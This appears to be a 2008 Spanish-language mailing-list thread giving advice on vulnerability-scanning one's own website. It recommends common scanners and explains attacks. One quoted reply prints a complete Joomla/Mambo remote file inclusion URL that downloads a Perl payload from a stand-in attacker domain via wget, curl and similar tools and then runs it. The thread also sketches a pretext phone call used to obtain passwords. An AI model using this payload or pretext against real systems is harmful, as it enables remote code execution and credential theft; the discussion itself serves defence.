Ethical Hacking, aspectos a considerar.
Claudio Salazar S.
csalazar en alumnos.inf.utfsm.cl
Vie Ene 18 20:51:25 CLST 2008
Alberto Rivera wrote:
> Asdtaker wrote:
>> Estimados, alguien tiene idea de los aspecto de debiese considerar a
>> la hora
>> de realizar un escaneo de vulnerabilidades a mi sitio web?
>>
>> Por ahora considero estos ITEMs:
>>
>> - Ingenieria Social: informacion disponible en la web.
>> - Archivos por defecto: todo aquello que viene con la instalacion en
>> bruto
>> del server web.
>> - Extensiones por defecto: analizar el impacto de soportar distintas
>> extensiones.
>> - Sesiones: comprobar validez de sesiones, etc.
>> - Manejo de errores: de aplicacion y servidor.
>> - SQL Injection.
>>
>>
>> Gracias por sus comentarios.
>>
> Mira toma nessus y lo corres desde el exterior y después desde el
> interior de la organización esto te va a encontrar varias
> vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y
> tratar de insertar exploits conocidos a servicios conocidos desde dentro
> y afuera cada vez, prueba varias herramientas en contra de tu sitio,
> trata de explotarlo de forma controlada, o sea, no lo hagas cuando estén
> todos trabajando ... esto te va a entregar una visión un poco más
> específica de cualquier problemática que puedas tener.
Metasploit tiene buen desarrollo ahora.
Tambien una utilidad que tiene la gente de Microsoft
MBSA (Microsoft Baseline Analyzer)
http://www.microsoft.com/spain/technet/seguridad/herramientas/mbsa.mspx
> Ahora para el
> desarrollo propiamente tal, prueba inyecciones de mysql, php y
> vulnerabilidades de javascript o ajax o lo que tengas, para hacer
> inyecciones de forma remota hay varias formas de hacerlo y están super
> documentadas incluso en youtube puedes encontrar videos bastante buenos
> ... a nivel de servidor elimina cualquier software que sirva para bajar
> cosas del internet para que no te puedan ejecutar ningún código dentro
> de la máquina
Borrar ftp ?
Un atacante con habilidades te crea un socket en ASP y adios downloaders.
> y para que imposibilites a los atacantes a hacer cosas
> como esta :
>
> http://tudominio/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=
>
> 1&GLOBALS=&mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?&cmd=cd%20/tmp;
>
> wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
> curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>
> lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>
> GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
> lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>
> links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>
> perl%20spkat.txt
>
Eso son casos especificos de explotacion de Mambo o Joomla con RFI. Él
dejo en claro hace rato que esta trabajando con IIS, asi que los wget,
curl -O, etc( que hacen lo mismo ), no tendrian validez, aunque
explotaciones de RFI sobre Windows dan resultado pero son un poco mas
rebuscadas.
> si te fijas aquí el atacante no se fija ni en ingeniería social ni en
> datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu sitio
> tiene permiso de ejecutar cualquiera de las aplicaciones de descarga o
> navegación, con esto baja un paquete, para el ejemplo spkat.txt y
> después lo ejecuta con perl. El spkat lo que hace es abrir puertos,
> levantar servicios, ejecutar troyanos dentro de la máquina o cualquier
> cosa ....
>
> Ahora lo de la ingeniera social es para cuestiones super puntuales por
> ejemplo, para conseguir acceso a un sistema en red, por ejemplo llamas a
> la secretaria de administración y le dices que eres el gerente de
> operaciones y le pides un nombre de usuario y password del sistema, así
> puedes ver realmente cual es el nivel de seguridad que cuentas de parte
> de los usuarios ... pero la ing. social no es encontrar información en
> internet.
>
> eso, espero te sirva
>
> salu2
>>
>>
>>
Más información sobre la lista de distribución Linux